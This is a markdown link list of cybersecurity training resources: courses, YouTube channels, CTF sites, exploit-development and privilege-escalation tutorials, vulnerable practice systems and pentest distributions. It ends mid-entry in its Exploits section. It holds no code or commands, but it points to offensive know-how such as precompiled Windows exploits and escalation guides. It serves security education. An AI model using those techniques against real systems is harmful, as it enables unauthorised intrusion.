[NEWS](#NEWS) * [Sharpening Your Skills](#sharpening-your-skills) * [Reverse Engineering, Buffer Overflow and Exploit Development](#reverse-engineering-buffer-overflow-and-exploit-development) * [Privilege Escalation](#privilege-escalation) * [Network Scanning / Reconnaissance](#network-scanning--reconnaissance) * [Malware Analysis](#malware-analysis) * [Vulnerable Web Application](#vulnerable-web-application) * [Vulnerable OS](#vulnerable-os) * [Exploits](#exploits) * [Forums](#forums) * [Archived Security Conference Videos](#archived-security-conference-videos) * [Online Communities](#online-communities) * [Online News Sources](#online-news-sources) * [Linux Penetration Testing OS](#linux-penetration-testing-os) ### Learning the Skills Name | Description ---- | ---- [CS 642: Intro to Computer Security](http://pages.cs.wisc.edu/~ace/cs642-spring-2016.html) | academic content, full semester course, includes assigned readings, homework and github refs for exploit examples. NO VIDEO LECTURES. [CyberSec WTF](https://cybersecurity.wtf) | CyberSec WTF Web Hacking Challenges from Bounty write-ups [Cybrary](https://www.cybrary.it/) | coursera style website, lots of user-contributed content, account required, content can be filtered by experience level [Free Cyber Security Training](https://www.samsclass.info/) | Academic content, 8 full courses with videos from a quirky instructor sam, links to research, defcon materials and other recommended training/learning [Hak5](https://www.hak5.org/) | podcast-style videos covering various topics, has a forum, "metasploit-minute" video series could be useful [Hopper's Roppers Security Training](https://hoppersroppers.org/training.html) | Four free self-paced courses on Computing Fundamentals, Security, Capture the Flags, and a Practical Skills Bootcamp that help beginners build a strong base of foundational knowledge. Designed to prepare for students for whatever they need to learn next. [Learning Exploitation with Offensive Computer Security 2.0](http://howto.hackallthethings.com/2016/07/learning-exploitation-with-offensive.html) | blog-style instruction, includes: slides, videos, homework, discussion. No login required. [Mind Maps](http://www.amanhardikar.com/mindmaps.html) | Information Security related Mind Maps [MIT OCW 6.858 Computer Systems Security](https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-858-computer-systems-security-fall-2014/) | academic content, well organized, full-semester course, includes assigned readings, lectures, videos, required lab files. [OffensiveComputerSecurity](https://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html) | academic content, full semester course including 27 lecture videos with slides and assign readings [OWASP top 10 web security risks](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) | free courseware, requires account [SecurityTube](http://www.securitytube.net/) | tube-styled content, "megaprimer" videos covering various topics, no readable content on site. [Seed Labs](http://www.cis.syr.edu/~wedu/seed/labs.html) | academic content, well organized, featuring lab videos, tasks, needed code files, and recommended readings [TryHackMe](https://tryhackme.com/) | Designed prebuilt challenges which include virtual machines (VM) hosted in the cloud ready to be deployed ### YouTube Channels Name | Description ---- | ---- [0patch by ACROS Security](https://www.youtube.com/channel/UCwlGrzF4on-bjiBhD8lO3QA) | few videos, very short, specific to 0patch [BlackHat](https://www.youtube.com/channel/UCJ6q9Ie29ajGqKApbLqfBOg) | features talks from the BlackHat conferences around the world [Christiaan008](https://www.youtube.com/channel/UCEPzS1rYsrkqzSLNp76nrcg) | hosts a variety of videos on various security topics, disorganized | <td colspan="2" > **Companies** </td> [Detectify](https://www.youtube.com/channel/UCm6N84sAaQ-BiNdCaaLT4qg) | very short videos, aimed at showing how to use Detictify scanner [Hak5](https://www.youtube.com/user/Hak5Darren) | see Hak5 above [Kaspersky Lab](https://www.youtube.com/channel/UCGhEv7BFBWdo0k4UXTm2eZg) | lots of Kaspersky promos, some hidden cybersecurity gems [Metasploit](https://www.youtube.com/channel/UCx4d2aRIfxfEUdS_5YIYKPg) | collection of medium length metasploit demos, ~25minutes each, instructional [ntop](https://www.youtube.com/channel/UCUYWuYlYKD5Yq5qBz0AIXJw/feed) | network monitoring, packet analysis, instructional [nVisium](https://www.youtube.com/channel/UCTE8R-Otq_kVTo08eLsfeyg) | Some nVisum promos, a handful of instructional series on Rails vulns and web hacking [OpenNSM](https://www.youtube.com/user/OpenNSM/feed) | network analysis, lots of TCPDUMP videos, instructional, [OWASP](https://www.youtube.com/user/OWASPGLOBAL) | see OWASP above [Rapid7](https://www.youtube.com/channel/UCnctXOUIeRFu1BR5O0W5e9w) | brief videos, promotional/instructional, ~ 5 minutes [Securelist](https://www.youtube.com/user/Securelist/featured) | brief videos, interviews discussing various cyber security topics [Segment Security](https://www.youtube.com/channel/UCMCI9TE3-PZ7CgKk7X6Qd_w/featured) | promo videos, non-instructional [SocialEngineerOrg](https://www.youtube.com/channel/UCC1vbVVbYdNe-OZRldj-U6g) | podcast-style, instructional, lengthy content ~1 hr each [Sonatype](https://www.youtube.com/user/sonatype/featured) | lots of random videos, a good cluster of DevOps related content, large range of lengths, disorganized [SophosLabs](https://www.youtube.com/user/SophosLabs/featured) | lots of brief, news-style content, "7 Deadly IT Sins" segment is of note [Sourcefire](https://www.youtube.com/user/SourcefireInc/featured) | lots of brief videos covering topics like botnets, DDoS ~5 minutes each [Station X](https://www.youtube.com/channel/UC-vWmE-BHcUrYW5zwDijL1g) | handful of brief videos, disorganized, unscheduled content updates [Synack](https://www.youtube.com/channel/UCRH0mvESjZ7eKY1LJZDPIbw/featured) | random, news-style videos, disorganized, non-instructional [TippingPoint Zero Day Initiative](https://www.youtube.com/channel/UChbH7B5YhXANmlMYJRHpw0g) | very brief videos ~30 sec, somewhat instructional [Tripwire, Inc.](https://www.youtube.com/user/TripwireInc/videos) | some tripwire demos, and random news-style videos, non-instructional [Vincent Yiu](https://www.youtube.com/channel/UCFVI3_M1zqFzEok2sTeEP8w/featured) | handful of videos from a single hacker, instructional | <td colspan="2"> **Conferences** </td> [44contv](https://www.youtube.com/user/44contv) | in [MIT OCW 6.858 Computer Systems Security](https://ocw.mit.edu/courses/electrical-engineering-and-computer-science) |Information security con based in London, lengthy instructional videos [BruCON Security Conference](https://www.youtube.com/channel/UCqwMU1l90lf9BLersW6eAHw) | security and hacker conference based in b\Belgium, lots of lengthy instructinoal videos [BSides Manchester](https://www.youtube.com/channel/UC1mLiimOTqZFK98VwM8Ke4w) | security and hacker con based in Mancheseter, lots of lengthy videos [BSidesAugusta](https://www.youtube.com/channel/UC85CvsnrVlD_44eEgzb2OfA) | security con based in Augusta, Georgia, lots of lengthy instructional videos [CarolinaCon](https://www.youtube.com/channel/UCTY3Dpz68CyrjwRzqkE4sFw) | security con based in North Carolina, associated with various 2600 chapters, lots of lengthy instructional content [Cort Johnson](https://www.youtube.com/channel/UCV9r-yMeARWVCJEesim25Ag) | a handful of lengthy con-style talks from Hack Secure Opensec 2017 [DevSecCon](https://www.youtube.com/channel/UCgxhfP2Hi8MQYz6ZkwpLA0A) | lenghty con videos covering DevSecOps, making software more secure [Garage4Hackers - Information Security](https://www.youtube.com/channel/UCDqagqREZlmJitWco-yPtvw/feed) | a handful of lengthy videos, About section lacks description [HACKADAY](https://www.youtube.com/channel/UCnv0gfLQFNGPJ5MHSGuIAkw) | lots of random tech content, not strictly infosec, some instructional [Hack In The Box Security Conference](https://www.youtube.com/channel/UC0BJVNTIEbG8CLG-xVVWJnA) | lengthy con-style instructional talks from an international security con [Hack in Paris](https://www.youtube.com/channel/UC7xJU9_oqw-vS6OJExS-2iA) | security con based in paris, features lots of instructional talks, slides can be difficult to see. [Hacklu](https://www.youtube.com/channel/UCI6B0zYvK-7FdM0Vgh3v3Tg/feed) | lots of lengthy con-style instructional videos [Hacktivity](https://www.youtube.com/user/hacktivity/feed) | lots of lengthy con-style instructional videos from a con in central/eastern europe [Hardwear.io](https://www.youtube.com/channel/UChwYb9xc9tZXquQxu4G0l_g/featured) | handful of lengthy con-style video, emphasis on hardware hacks [IEEE Symposium on Security and Privacy](https://www.youtube.com/channel/UC6pXMS7qre9GZW7A7FVM90Q) | content from the symposium; IEEE is a professional association based in the us, they also publish various journals [LASCON](https://www.youtube.com/channel/UCDHsOiMPS-SLppAOAJRD37Q) | lengthy con-style talks from an OWASP con held in Austin, TX [leHACK](https://www.youtube.com/channel/UCSxk_CUfES4ly5Sspc0Vorw) | leHACK is the oldest ( 2003 ), leading, security conference in Paris, FR [Marcus Niemietz](https://www.youtube.com/channel/UCtThfJl65L04ukWp0XZi3yg/videos) | lots of instructional content, associated with HACKPRA, an offensive security course from an institute in Germany [Media.ccc.de](https://www.youtube.com/channel/UC2TXq_t06Hjdr2g_KdKpHQg) | The real official channel of the chaos computer club, operated by the CCC VOC - tons of lengthy con-style vids [NorthSec](https://www.youtube.com/channel/UCqVhMzTdQK5VAosAGkMtpJw) | lengthy con-style talks from an applied security conference in Canada [Pancake Nopcode](https://www.youtube.com/channel/UC3G6k7XfTgcWD2PJR8qJSkQ) | channel of Radare2 whiz Sergi "pancake" Alvarez, Reverse Engineering Content [Psiinon](https://www.youtube.com/channel/UC-3qyzm4f29C12KGp3-12bQ) | medium length instructional videos, for the OWASP Zed Attack Proxy [SJSU Infosec](https://www.youtube.com/channel/UCDNzNvZlYK8jZLsUbdiGrsQ/videos) | handful of lengthy instructional videos from San Jose State university Infosec [Secappdev.org](https://www.youtube.com/channel/UCSii2fuiLLlGqaR6sR_y0rA) | tons of lengthy instructional lectures on Secure App Development [Security Fest](https://www.youtube.com/channel/UCByLDp7r7gHGoO7yYMYFeWQ) | medium length con-style talks from a security festival in Sweden [SecurityTubeCons](https://www.youtube.com/channel/UC2wNN-Zqiq4J1PLPnyMBWUg) | an assortment of con-style talks from various cons including BlackHat and Shmoocon [ToorCon](https://www.youtube.com/channel/UCnzjmL0xkTBYwFZD7agHGWw) | handful of medium length con videos from con based in San Diego, CA [USENIX Enigma Conference](https://www.youtube.com/channel/UCIdV7bE97mSPTH1mOi_yUrw/feed) | medium length "round table discussion with leading experts", content starts in 2016 [ZeroNights](https://www.youtube.com/channel/UCtQ0fPmP4fCGBkYWMxnjh6A) | a lot of con-style talks from international conference ZeroNights | <td colspan = "2"> **News** </td> [0x41414141](https://www.youtube.com/channel/UCPqes566OZ3G_fjxL6BngRQ) | Channel with couple challenges, well explained [Adrian Crenshaw](https://www.youtube.com/user/irongeek) | lots of lengthy con-style talks [Corey Nachreiner](https://www.youtube.com/channel/UC7dUL0FbVPGqzdb2HtWw3Xg) | security newsbites, 2.7K subscribers, 2-3 videos a week, no set schedule [BalCCon - Balkan Computer Congress](https://www.youtube.com/channel/UCoHypmu8rxlB5Axh5JxFZsA) | Long con-style talks from the Balkan Computer Congress, doesn't update regularly [danooct1](https://www.youtube.com/channel/UCqbkm47qBxDj-P3lI9voIAw) | lots of brief screenshot, how-to vids regarding malware, regular content updates, 186K followerss [DedSec](https://www.youtube.com/channel/UCx34ZZW2KgezfUPPeL6m8Dw) | lots of brief screenshot how-to vids based in Kali, no recent posts. [DEFCON Conference](https://www.youtube.com/channel/UC6Om9kAkl32dWlDSNlDS9Iw) | lots of lengthy con-style vids from the iconical DEFCON [DemmSec](https://www.youtube.com/channel/UCJItQmwUrcW4VdUqWaRUNIg) | lots of pen testing vids, somewhat irregular uploads, 44K followers [Derek Rook - CTF/Boot2root/wargames Walkthrough](https://www.youtube.com/channel/UCMACXuWd2w6_IEGog744UaA) | lots of lengthy screenshot instructional vids, with [Don Does 30](https://www.youtube.com/channel/UCarxjDjSYsIf50Jm73V1D7g) | amateur pen-tester posting lots of brief screenshot vids regularly, 9K Followers [Error 404 Cyber News](https://www.youtube.com/channel/UC4HcNHFKshqj-aeyi6imW7Q) | short screen-shot videos with loud metal, no dialog, bi-weekly [Geeks Fort - KIF](https://www.youtube.com/channel/UC09NdTL2hkThGLSab8chJMw) | lots of brief screenshot vids, no recent posts [GynvaelEN](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg) | Security streams from Google Researcher. Mainly about CTFs, computer security, programing and similar things. [HackerSploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) | regular posts, medium length screenshot vids, with dialog [HACKING TUTORIALS](https://www.youtube.com/channel/UCbsn2kQwNxcIzHwbdDjzehA) | handful of brief screenshot vids, no recent posts. [iExplo1t](https://www.youtube.com/channel/UCx0HClQ_cv0sLNOVhoO2nxg/videos) | lots of screenshot vids aimed at novices, 5.7K Followers, no recent posts [JackkTutorials](https://www.youtube.com/channel/UC64x_rKHxY113KMWmprLBPA) | lots of medium length instructional vids with some AskMe vids from the youtuber [John Hammond](https://www.youtube.com/user/RootOfTheNull) | Solves CTF problems. contains penTesting tips and tricks [Latest Hacking News](https://www.youtube.com/user/thefieldhouse/feed) | 10K followers, medium length screenshot videos, no recent releases [LionSec](https://www.youtube.com/channel/UCCQLBOt_hbGE-b9I696VRow) | lots of brief screenshot instructional vids, no dialog [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) | Lots of brief-to-medium instructional vids, covering things like buffer overflows and exploit writing, regular posts. [Metasploitation](https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg) | lots of screenshot vids, little to no dialogue, all about using Metasploit, no recent vids. [NetSecNow](https://www.youtube.com/channel/UC6J_GnSAi7F2hY4RmnMcWJw) | channel of pentesteruniversity.org, seems to post once a month, screenshot instructional vids [Open SecurityTraining](https://www.youtube.com/channel/UCthV50MozQIfawL9a_g5rdg) | lots of lengthy lecture-style vids, no recent posts, but quality info. [Pentester Academy TV](https://www.youtube.com/channel/UChjC1q6Ami7W0E71TzPZELA) | lots of brief videos, very regular posting, up to +8 a week [Penetration Testing in Linux](https://www.youtube.com/channel/UC286ntgASMskhPIJQebJVvA) | DELETE [rwbnetsec](https://www.youtube.com/channel/UCAJ8Clc3188ek9T_5XTVzZQ) | lots of medium length instructional videos covering tools from Kali 2.0, no recent posts. [Samy Kamkar's Applied Hacking](https://www.youtube.com/user/s4myk) | brief to medium length instructional vids from the creator of PoisonTap for the Raspberry Pi Zero, no recent content, last updated in 2016 [SecureNinjaTV](https://www.youtube.com/channel/UCNxfV4yR0nIlhFmfwcdf3BQ) | brief news bites, irregular posting, 18K followers [Security Weekly](https://www.youtube.com/channel/UCg--XBjJ50a9tUhTKXVPiqg) | regular updates, lengthy podcast-style interviews with industry pros [Seytonic](https://www.youtube.com/channel/UCW6xlqxSY3gGur4PkGPEUeA) | variety of DIY hacking tutorials, hardware hacks, regular updates [Shozab Haxor](https://www.youtube.com/channel/UCBwub2kRoercWQJ2mw82h3A) | lots of screenshot style instructional vids, regular updates, windows CLI tutorial [SSTec Tutorials](https://www.youtube.com/channel/UCHvUTfxL_9bNQgqzekPWHtg) | lots of brief screenshot vids, regular updates [Tradecraft Security Weekly](https://wiki.securityweekly.com/Tradecraft_Security_Weekly) | Want to learn about all of the latest security tools and techniques? [Troy Hunt](https://www.youtube.com/channel/UCD6MWz4A61JaeGrvyoYl-rQ) | lone youtuber, medium length news videos, 16K followers, regular content [Waleed Jutt](https://www.youtube.com/channel/UCeN7cOELsyMHrzfMsJUgv3Q) | lots of brief screenshot vids covering web security and game programming [webpwnized](https://www.youtube.com/channel/UCPeJcqbi8v46Adk59plaaXg) | lots of brief screenshot vids, some CTF walkthroughs [Zer0Mem0ry](https://www.youtube.com/channel/UCDk155eaoariJF2Dn2j5WKA) | lots of brief c++ security videos, programming intensive [LionSec](https://www.youtube.com/channel/UCCQLBOt_hbGE-b9I696VRow) | lots of brief screenshot instructional vids, no dialog [Adrian Crenshaw](https://www.youtube.com/user/irongeek) | lots of lengthy con-style talks [HackerSploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) | regular posts, medium length screenshot vids, with dialog [Derek Rook - CTF/Boot2root/wargames Walkthrough](https://www.youtube.com/channel/UCMACXuWd2w6_IEGog744UaA) | lots of lengthy screenshot instructional vids, with [Tradecraft Security Weekly](https://wiki.securityweekly.com/Tradecraft_Security_Weekly) | Want to learn about all of the latest security tools and techniques? [IPPSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) | Hackthebox.eu retired machine vulnerable machine walkthroughs to help you learn both basic and advanced processes and techniques [The Daily Swig](https://portswigger.net/daily-swig) | Latest Cybersecurity News ### Sharpening Your Skills Name | Description ---- | ---- [Backdoor](https://backdoor.sdslabs.co) | pen testing labs that have a space for beginners, a practice arena and various competitions, account required [The cryptopals crypto challenges](http://cryptopals.com/) | A bunch of CTF challenges, all focused on cryptography. [Challenge Land](http://challengeland.co/) | Ctf site with a twist, no simple sign-up, you have to solve a challengeto even get that far! [Crackmes.de Archive (2011-2015)](https://tuts4you.com/download.php?view.3152) | a reverse engineering information Repo, started in 2003 [Crackmes.one](https://crackmes.one/) | This is a simple place where you can download crackmes to improve your reverse engineering skills. [CTFLearn](https://ctflearn.com/) | an account-based ctf site, where users can go in and solve a range of challenges [CTFs write-ups](https://github.com/ctfs) | a collection of writeups from various CTFs, organized by [CTF365](https://ctf365.com/) | account based ctf site, awarded by Kaspersky, MIT, T-Mobile [The enigma group](https://www.enigmagroup.org/) | web application security training, account based, video tutorials [Exploit exercises](https://exploit-exercises.com/) | hosts 5 fulnerable virtual machines for you to attack, no account required [Google CTF](https://github.com/google/google-ctf) | Source code of Google 2017, 2018 and 2019 CTF [Google CTF 2019](https://capturetheflag.withgoogle.com/) | 2019 edition of the Google CTF contest [Google's XSS game](https://xss-game.appspot.com/) | XSS challenges, and potentially a chance to get paid! [Hack The Box](https://www.hackthebox.gr/en/login) | Pen testing labs hosting over 39 vulnerable machines with two additional added every month [Hacker test](http://www.hackertest.net/) | similar to "hackthissite", no account required. [Hacker Gateway](https://www.hackergateway.com/) | ctfs covering steganography, cryptography, and web challengs, account required [Hacksplaining](https://www.hacksplaining.com/) | a clickthrough security informational site, very good for beginners. [hackburger.ee](http://hackburger.ee/) | hosts a number of web hacking challenges, account required [Hack.me](https://hack.me/) | lets you build/host/attack vulnerable web apps [Hack this site!](https://www.hackthissite.org/) | an oldy but goodie, account required, users start at low levels and progress in difficulty [knock.xss.moe](https://knock.xss.moe) | XSS challenges, account required. [Lin.security](https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/) | Practice your Linux privilege escalation [noe.systems](http://noe.systems/) | Korean challenge site, requires an account [Over the wire](http://overthewire.org/wargames/) | A CTF that's based on progressive levels for each lab, the users SSH in, no account recquired [Participating Challenge Sites](http://www.wechall.net/active_sites/all/by/site_avg/DESC/page-1) | aims at creating a universal ranking for CTF participants [PentesterLab](https://pentesterlab.com/) | hosts a variety of exercises as well as various "bootcamps" focused on specific activities [Pentestit](https://lab.pentestit.ru/) | acocunt based CTF site, users have to install open VPN and get credentials [Pentest Practice](https://www.pentestpractice.com/) | account based Pentest practice, free to sign up, but there's also a pay-as-you-go feature [Pentest.training](https://pentest.training) | lots of various labs/VMS for you to try and hack, registry is optional. [PicoCTF](https://2017game.picoctf.com/) | CTF hosted by Carnegie Mellon, occurs yearly, account required. [pwnable.kr](http://pwnable.kr/) | Don't let the cartoon characters fool you, this is a serious CTF site that will teach you a lot, account required [pwnable.tw](http://pwnable.tw/) | hosts 27 challenges accompanied with writeups, account required [Ringzer0 Team](https://ringzer0team.com/challenges) | an account based CTF site, hosting over 272 challenges [ROP Emporium](https://ropemporium.com/) | Return Oriented Programming challenges [SmashTheStack](http://smashthestack.org/wargames.html) | hosts various challenges, similar to OverTheWire, users must SSH into the machines and progress in levels [Shellter Labs](https://shellterlabs.com/en/) | account based infosec labs, they aim at making these activities social [Solve Me](http://solveme.safflower.kr/) | "yet another challenge", account required. [Vulnhub](https://www.vulnhub.com/) | site hosts a ton of different vulnerable Virtual Machine images, download and get hacking [websec.fr](https://websec.fr/) | Focused on web challenges, registration is optional. [tryhackme](https://tryhackme.com) | Awesome platform to start learning cybersecurity, account is needed [webhacking.kr](https://webhacking.kr) | lots of web security challenges are available, recommended for beginners. You need to solve a simple challenge to sign up. [Stereotyped Challenges](https://chall.stypr.com/) | Challenges for web security professionals, account required. [Stripe CTF 2.0](https://github.com/stripe-ctf) | Past security contest where you can discover and exploit vulnerabilities in mock web applications. [Windows / Linux Local Privilege Escalation Workshop](https://github.com/sagishahar/lpeworkshop) | Practice your Linux and Windows privilege escalation [Hacking Articles](http://www.hackingarticles.in/ctf-challenges1/) | CTF Brief Write up collection with a lot of screenshots good for begginers [Hacker101 CTF](https://ctf.hacker101.com/) | CTF hosted by HackerOne, always online. You will receive invitations to some private programs on HackerOne platform as a reward. [Hacking Lab](https://www.hacking-lab.com/index.html) | European platform hosting lots of riddles, challenges and competitions [Portswigger](https://portswigger.net/) | Best Platform inorder to learn Web Pentesting, account required ### Reverse Engineering, Buffer Overflow and Exploit Development Name | Description ---- | ---- [A Course on Intermediate Level Linux Exploitation](https://github.com/nnamon/linux-exploitation-course) | as the title says, this course isn't for beginners [Analysis and exploitation (unprivileged)](https://www.it-sec-catalog.info/analysis_and_exploitation_unprivileged.html) | huge collection of RE information, organized by type. [Binary hacking](http://liveoverflow.com/binary_hacking/index.html) | 35 "no bullshit" binary videos along with other info [Buffer Overflow Exploitation Megaprimer for Linux](http://www.securitytube.net/groups?operation=view&groupId=4) | Collection of Linux Rev. Engineering videos [Corelan tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) | detailed tutorial, lots of good information about memory [Exploit tutorials](http://www.primalsecurity.net/tutorials/exploit-tutorials/) | a series of 9 exploit tutorials,also features a podcast [Exploit development](https://0x00sec.org/c/exploit-development) | links to the forum's exploit dev posts, quality and post style will vary with each poster [flAWS challenge](http://flaws.cloud/) | Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). [Introduction to ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) | tons of tutorials from infosec pro Azeria, follow her on twitter [Introductory Intel x86](http://www.opensecuritytraining.info/IntroX86.html) | 63 days of OS class materials, 29 classes, 24 instructors, no account required [Lena's Reversing for Newbies (Complete)](https://tuts4you.com/download.php?view.2876) | listing of a lengthy resource by Lena, aimed at being a course [Linux (x86) Exploit Development Series](https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/) | blog post by sploitfun, has 3 different levels [Megabeets journey into Radare2](https://www.megabeets.net/a-journey-into-radare-2-part-1/) | one user's radare2 tutorials [Modern Binary Exploitation - CSCI 4968](https://github.com/RPISEC/MBE) | RE challenges, you can download the files or download the VM created by RPISEC specifically for challenges, also links to their home page with tons of infosec lectures [Recon.cx - reversing conference](https://recon.cx/) | the conference site contains recordings and slides of all talks!! [Reverse Engineering for Beginners](https://beginners.re/RE4B-EN.pdf) | huge textbook, created by Dennis Yurichev, open-source [Reverse engineering reading list](https://github.com/onethawt/reverseengineering-reading-list/blob/master/README.md) | a github collection of RE tools and books [Reverse Engineering challenges](https://challenges.re/) | collection of challenges from the writer of RE for Beginners [Reverse Engineering for beginners (GitHub project)](https://github.com/dennis714/RE-for-beginners) | github for the above [Reverse Engineering Malware 101](https://malwareunicorn.org/workshops/re101.html) | intro course created by Malware Unicorn, complete with material and two VM's [Reverse Engineering Malware 102](https://malwareunicorn.org/workshops/re102.html) | the sequel to RE101 [reversing.kr challenges](http://www.reversing.kr/challenge.php) | reverse engineering challenges varying in difficulty [Shell storm](http://shell-storm.org/) | Blog style collection with organized info about Rev. Engineering. [Shellcode Injection](https://dhavalkapil.com/blogs/Shellcode-Injection/) | a blog entry from a grad student at SDS Labs [Micro Corruption — Assembly](https://microcorruption.com) | CTF designed to learn Assembly by practicing ### Privilege Escalation Name | Description ---- | ---- [4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) | shows different examples of PE [A GUIDE TO LINUX PRIVILEGE ESCALATION](https://payatu.com/guide-linux-privilege-escalation/) | Basics of Linux privilege escalation [Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790) | Abusing SUDO (Linux Privilege Escalation) [AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) | automated scripts that downloads and compiles from exploitdb [Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | basic linux exploitation, also covers Windows [Common Windows Privilege Escalation Vectors](https://www.toshellandback.com/2015/11/24/ms-priv-esc/) | Common Windows Privilege Escalation Vectors [Editing /etc/passwd File for Privilege Escalation](http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) | Editing /etc/passwd File for Privilege Escalation [Linux Privilege Escalation ](https://securityweekly.com/2017/12/17/linux-privilege-escalation-tradecraft-security-weekly-22/) | Linux Privilege Escalation – Tradecraft Security Weekly (Video) [Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) | a simple linux PE check script [Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) | a list of PE checking scripts, some may have already been covered [Linux Privilege Escalation Using PATH Variable](http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/) | Linux Privilege Escalation Using PATH Variable [Linux Privilege Escalation using Misconfigured NFS](http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/) | Linux Privilege Escalation using Misconfigured NFS [Linux Privilege Escalation via Dynamically Linked Shared Object Library](https://www.contextis.com/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library) | How RPATH and Weak File Permissions can lead to a system compromise. [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) | good resources that could be compiled into a script [OSCP - Windows Priviledge Escalation](http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) | Common Windows Priviledge Escalation [Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) | covers a couple different exploits for Windows and Linux [Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) | covers a couple common PE methods in linux [Reach the root](https://hackmag.com/security/reach-the-root/) | discusses a process for linux privilege exploitation [RootHelper](https://github.com/NullArray/RootHelper) | a tool that runs various enumeration scripts to check for privilege escalation [Unix privesc checker](http://pentestmonkey.net/tools/audit/unix-privesc-check) | a script that checks for PE vulnerabilities on a system [Windows exploits, mostly precompiled.](https://github.com/abatchy17/WindowsExploits) | precompiled windows exploits, could be useful for reverse engineering too [Windows Privilege Escalation](http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation) | collection of wiki pages covering Windows Privilege escalation [Windows Privilege Escalation](https://memorycorruption.org/windows/2018/07/29/Notes-On-Windows-Privilege-Escalation.html) | Notes on Windows Privilege Escalation [Windows privilege escalation checker](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md) | a list of topics that link to pentestlab.blog, all related to windows privilege escalation [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) | collection of great info/tutorials, option to contribute to the creator through patreon, creator is an OSCP [Windows Privilege Escalation Guide](https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/) | Windows Privilege Escalation Guide [Windows Privilege Escalation Methods for Pentesters](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/) | Windows Privilege Escalation Methods for Pentesters ### Malware Analysis Name | Description ---- | ---- [Malware traffic analysis](http://www.malware-traffic-analysis.net/) | list of traffic analysis exercises [Malware Analysis - CSCI 4976](https://github.com/RPISEC/Malware/blob/master/README.md) | another class from the folks at RPISEC, quality content [Bad Binaries] (https://www.badbinaries.com/) | walkthrough documents of malware traffic analysis exercises and some occasional malware analysis. ### Network Scanning / Reconnaissance Name | Description ---- | ---- [Foot Printing with WhoIS/DNS records](https://www.sans.org/reading-room/whitepapers/hackers/fundamentals-computer-hacking-956) | a white paper from SANS [Google Dorks/Google Hacking](https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc/) | list of commands for google hacks, unleash the power of the world's biggest search engine ### Vulnerable Web Application Name | Description ---- | ---- [bWAPP](http://www.itsecgames.com/) | common buggy web app for hacking, great for beginners, lots of documentation [Damn Small Vulnerable Web](https://github.com/stamparm/DSVW) | written in less than 100 lines of code, this web app has tons of vulns, great for teaching [Damn Vulnerable Web Application (DVWA)](http://www.dvwa.co.uk/) | PHP/MySQL web app for testing skills and tools [Google Gruyere](https://google-gruyere.appspot.com/) | host of challenges on this cheesy web app [OWASP Broken Web Applications Project](https://github.com/chuckfw/owaspbwa/) | hosts a collection of broken web apps [OWASP Hackademic Challenges project](https://github.com/Hackademic/hackademic/) | web hacking challenges [OWASP Mutillidae II](https://sourceforge.net/projects/mutillidae/files/) | another OWASP vulnerable app, lots of documentation. [OWASP Juice Shop](https://github.com/bkimminich/juice-shop) | covers the OWASP top 10 vulns [WebGoat: A deliberately insecure Web Application](https://github.com/WebGoat/WebGoat) | maintained by OWASP and designed to to teach web app security ### Vulnerable OS Name | Description ---- | ---- [General Test Environment Guidance](https://community.rapid7.com/docs/DOC-2196) | white paper from the pros at rapid7 [Metasploitable2 (Linux)](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) | vulnerable OS, great for practicing hacking [Metasploitable3](https://github.com/rapid7/metasploitable3) \[[Installation](https://github.com/rapid7/metasploitable3/blob/master/README.md)\] | the third installation of this vulnerable OS [Vulnhub](https://www.vulnhub.com/) | collection of tons of different vulnerable OS and challenges ### Linux Penetration Testing OS Name | Description ---- | ----- [Android Tamer](https://androidtamer.com//) | Android Tamer is a Virtual / Live Platform for Android Security professionals. [BackBox](https://backbox.org/index) | open source community project, promoting security in IT enivornments [BlackArch](https://blackarch.org/index.html) | Arch Linux based pentesting distro, compatible with Arch installs [Bugtraq](http://bugtraq-team.com/) | advanced GNU Linux pen-testing technology [Docker for pentest](https://github.com/aaaguirrep/pentest) | Image with the more used tools to create a pentest environment easily and quickly. [Kali](http://kali.org/) | the infamous pentesting distro from the folks at Offensive Security [LionSec Linux](https://lionsec-linux.org/) | pentesting OS based on Ubuntu [Parrot ](https://www.parrotsec.org/) | Debian includes full portable lab for security, DFIR, and development [Pentoo](https://www.pentoo.ch/) | pentesting OS based on Gentoo ### Exploits Name | Description ---- | ---- [0day.today](http://0day.today/) | 